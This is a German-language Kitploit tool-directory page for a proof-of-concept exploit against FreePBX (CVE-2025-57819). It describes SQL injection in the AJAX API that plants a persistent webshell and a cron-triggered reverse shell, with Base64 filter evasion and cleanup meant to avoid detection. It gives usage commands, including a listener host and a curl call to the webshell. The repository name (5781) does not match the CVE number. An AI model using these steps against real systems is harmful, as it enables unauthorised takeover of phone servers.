Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5781 — Proof-of-concept-Exploit für CVE-2025-57819 in FreePBX: SQL-Injection in der AJAX-API, um beliebigen PHP-Code auszuführen, eine persistente Webshell zu erstellen und eine Reverse-Shell auszulösen. | Kitploit
Tools/GitHubGitHub/jasonbernier/cve-2025-5781
PersistenzmechanismenExploitationWebanwendungs-ExploitationPost-ExploitationCommand and ControlPayload-Entwicklung
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

Proof-of-concept-Exploit für CVE-2025-57819 in FreePBX: SQL-Injection in der AJAX-API, um beliebigen PHP-Code auszuführen, eine persistente Webshell zu erstellen und eine Reverse-Shell auszulösen.

Repository anzeigen
vor 8 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

FreePBX CVE-2025-57819 Exploit

Beschreibung

Dieses Skript nutzt eine Schwachstelle in FreePBX-Versionen vor 16.0.26.0 (CVE-2025-57819) aus, die es entfernten Angreifern ermöglicht, beliebigen PHP-Code über eine SQL-Injection-Schwachstelle im AJAX-API-Endpunkt auszuführen. Der Exploit erstellt sowohl eine Webshell als auch eine automatisch ausgelöste Reverse Shell.

Details zur Schwachstelle

  • CVE: CVE-2025-57819
  • Betroffene Versionen: FreePBX < 16.0.26.0
  • Auswirkung: Remote Code Execution (RCE)
  • Vektor: SQL-Injection in der AJAX-API (/admin/ajax.php)

Funktionen

  • Erstellt eine persistente Webshell unter /pbxshell.php
  • Richtet eine automatisch ausgelöste Reverse Shell über einen Cron-Job ein
  • Verwendet Base64-kodierte Payloads, um Filter zu umgehen
  • Automatische Bereinigung von Cron-Jobs nach der Ausführung

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek
  • Netcat (für den Reverse-Shell-Listener)

Installation

root@kitploit:~
git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

Verwendung

root@kitploit:~
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

Parameter:

  • -H HOST: Ziel-FreePBX-Instanz (z. B. https://freepbx.example.com)
  • -lhost LHOST: Ihre IP für den Reverse-Shell-Callback
  • -lport LPORT: Port für die Reverse-Shell-Verbindung

Beispiel:

root@kitploit:~
python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

Exploit-Ablauf

  1. Sendet eine SQL-Injection-Payload, um eine Webshell zu erstellen
  2. Wartet, bis die Webshell erstellt wurde (~2 Minuten)
  3. Erstellt eine automatisch ausgelöste Reverse Shell über einen Cron-Job
  4. Startet einen Netcat-Listener auf dem angegebenen Port

Verwendung der Webshell

Nach erfolgreicher Ausnutzung greifen Sie wie folgt auf die Webshell zu:

root@kitploit:~
curl -X GET "http://TARGET/pbxshell.php?cmd=id"

Bereinigung

Der Exploit entfernt nach der Ausführung automatisch Cron-Jobs, um eine Erkennung zu vermeiden.

Hinweise

  • Das Skript verwendet --, um die verbleibende SQL-Syntax auszukommentieren
  • Alle Befehle werden mit Root-Rechten ausgeführt
  • Erfordert Schreibzugriff auf das Verzeichnis /var/www/html/

Referenzen

  • CVE-2025-57819
  • FreePBX-Sicherheitshinweis
Tool herunterladen